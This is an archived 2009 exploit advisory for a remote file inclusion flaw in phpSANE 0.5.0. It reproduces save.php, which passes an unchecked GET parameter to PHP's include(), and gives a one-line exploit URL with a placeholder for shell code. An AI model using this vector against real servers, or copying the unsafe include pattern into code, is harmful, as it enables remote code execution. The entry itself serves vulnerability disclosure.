phpSANE 0.5.0 Remote File Inclusion

2009-08-27T00:00:00
ID PACKETSTORM:80723
Type packetstorm
Reporter CoBRa_21
Modified 2009-08-27T00:00:00

Description

                                        
                                            `-----------------------------------------------------------------------------------  
phpSANE v 0.5.0 (save.php) Remote File Inclusion Vulnerability  
-----------------------------------------------------------------------------------  
Author: CoBRa_21  
Mail: uyku_cu@windowslive.com  
Script Download:http://sourceforge.net/projects/phpsane/  
Dork: Yok :P  
-----------------------------------------------------------------------------------  
BUG  
<?PHP  
include("language.php");  
  
$file_save = $_GET['file_save'];  
$file_save_image = $_GET['file_save_image'];  
$lang_id = $_GET['lang_id'];  
  
if ($file_save_image)  
{  
echo "<p class=\"align_center\">\n";  
echo "<img src=\"".$file_save."\" border=\"2\">\n";  
echo "</p>\n";  
}  
else  
{  
// my_pre my_mono  
echo "<p class=\"my_pre\">\n";  
include($file_save);  
echo "</p>\n";  
echo "<hr>\n";  
}  
-----------------------------------------------------------------------------------  
Exploit  
http://localhost/path/save.php?file_save= (Shell Code)  
-----------------------------------------------------------------------------------  
Tüm İslam Aleminin Ramazan-ı Şerifleri Hayırlı ve Mubarek Olsun.  
-----------------------------------------------------------------------------------  
  
  
`